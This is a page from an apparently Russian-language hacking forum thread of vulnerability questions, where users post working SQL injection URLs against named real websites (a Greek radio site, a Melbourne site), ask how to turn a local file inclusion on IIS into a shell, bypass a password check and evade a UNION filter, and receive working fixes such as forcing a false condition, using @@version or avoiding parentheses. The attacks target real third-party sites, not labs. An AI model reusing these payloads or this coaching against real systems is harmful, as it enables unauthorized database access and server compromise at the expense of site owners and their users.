Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. kroŧ

    kroŧ Member

    Joined:
    19 May 2010
    Messages:
    129
    Likes Received:
    33
    Reputations:
    8
    http://www.onradio.gr/play_old.php?id=1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+
    кроме ошибки ни чего не выводит версию не прозывает,
    смог только имя базы узнать onrad2_radio
    http://www.onradio.gr/play_old.php?id=1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+FROM+users--+

    Если при запросе union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33
    ни выводит ни одну из цифр значит ни чего не сделать?
     
  2. sourcec0de

    sourcec0de Banned

    Joined:
    13 Jun 2011
    Messages:
    27
    Likes Received:
    12
    Reputations:
    7
    зафолсите запрос, там есть вывод
    http://www.onradio.gr/play_old.php?id=1+and(version()=user())+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+
     
  3. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Ребята инклуд локал на вин серве, залить ничего не могу, стоит иис, что б такое проинклюдить чтобы заполучить шелл?
     
  4. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    тынц
     
    _________________________
  5. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    2shell_code Знаю на зубок эту тему, вот только написал, что стоит IIS (а не апач), и да ошибку мускула сделать не могу, чтобы проинклюдить логи мускула. фтп не стоит.
    з.ы. за отклик спасибо шелл
     
    #17085 Lijzer, 17 Jun 2011
    Last edited: 17 Jun 2011
  6. garaj

    garaj Banned

    Joined:
    10 May 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    server-status и server-info

    Открыты файлы sever-status и server-info.
    Что злоумышленник может сделать, используя эту информацию?
    Н-р:
    http://ts-tvoimir.ru/server-status

    Кроме как использовать эту информацию при ддосе, больше же ничего он не почерпнет из этих файлов?
     
  7. GIG

    GIG New Member

    Joined:
    17 Apr 2010
    Messages:
    46
    Likes Received:
    4
    Reputations:
    5
    Есть ли в IIS какие нибудь файлы содержащие пути к виртуальным каталогам?
     
  8. kroŧ

    kroŧ Member

    Joined:
    19 May 2010
    Messages:
    129
    Likes Received:
    33
    Reputations:
    8
    http://www.sait.com/news.php?id=12+uNiOn+all+seLeCT+1,2,3,concat(grantee,0x3a,is_grantable),5,6,7,8+from+information_schema.user_privileges
    Выдает
    'user'@'%':NO:USAGE 1 строка
    http://www.sait.com/news.php?id=12+uNiOn+all+seLeCT+1,2,3,PRIVILEGE_TYPE,5,6,7,8+from+information_schema.user_privileges+where+IS_GRANTABLE=0x594553
    пусто
    делаю тоже самое но на localhost работает, может кто сталкивался с эти, хотел бы узнать права юзера но как это сделать?
     
    #17088 kroŧ, 18 Jun 2011
    Last edited: 18 Jun 2011
  9. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    Пишу запрос +union+select+1,2,3,4,5,6,7,8+--
    Нужной цифрой является 2. И когда я посылаю что то по типу: +union+select+1,user(),3,4,5,6,7,8+-- или +union+select+1,database(),3,4,5,6,7,8+-- предо мной загружается чистейший, белый лист.
    В чем тут проблема? Как это исправить? С какой стороны подойти?
     
  10. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    unhex(hex(user())) или @@version
     
    _________________________
    1 person likes this.
  11. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Шелл в 98% http://forum.antichat.ru/showpost.php?p=2691294&postcount=17
     
    _________________________
  12. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    Expl0ited, да, спасибо. @@version сработало. Вот @@user() @@database... Не то.
    Можешь меня ткнуть носом где об этом почитать? То как так использовать подобное. Уж очень хочется ее раскрутить.
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    @@user и @@database не заработали, потому что нету таких системных переменных, походу у тебя фильтрация скобок

    пробуй пост запросы
     
    _________________________
    1 person likes this.
  14. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Ну стало ясно что фильтруются скобки, можешь спокойно крутить без их использования, просто отказавшись от функций, используя стандартный набор union select column from table where column=data limit 1
     
    _________________________
  15. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    Как вот это юзать - Apache 2.2.14 mod_isapi Dangling Pointer ??
     
  16. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    http://securityreason.com/exploitalert/7905
     
    _________________________
  17. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    Спасибо, но я уже в гугле побывал несколько раз. Как сплоиты под винду юзать вообще не представляю. С виндою не очень дружу...
     
  18. stasiliy

    stasiliy New Member

    Joined:
    26 Sep 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    Помогите плз.

    Если $_POST не фильтруеться. НА сервере вот какая проверка идет:
    Что можно подставить, чтобы обойти этот IF ??
    Спасибо
     
  19. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    если есть доступ к исходникам, то просто найди присвоеное значение переменной $passwd
     
    _________________________
  20. kroŧ

    kroŧ Member

    Joined:
    19 May 2010
    Messages:
    129
    Likes Received:
    33
    Reputations:
    8
    Как можно обойти такой фильтр?
    http://www.onlymelbourne.com.au/melbourne.php?id=-371/*!UNioN*/SELeCT+1
    просто переходит на:
    http://www.onlymelbourne.com.au/melbourne.php
    Заранее благодарю за любой ответ.
     
Thread Status:
Not open for further replies.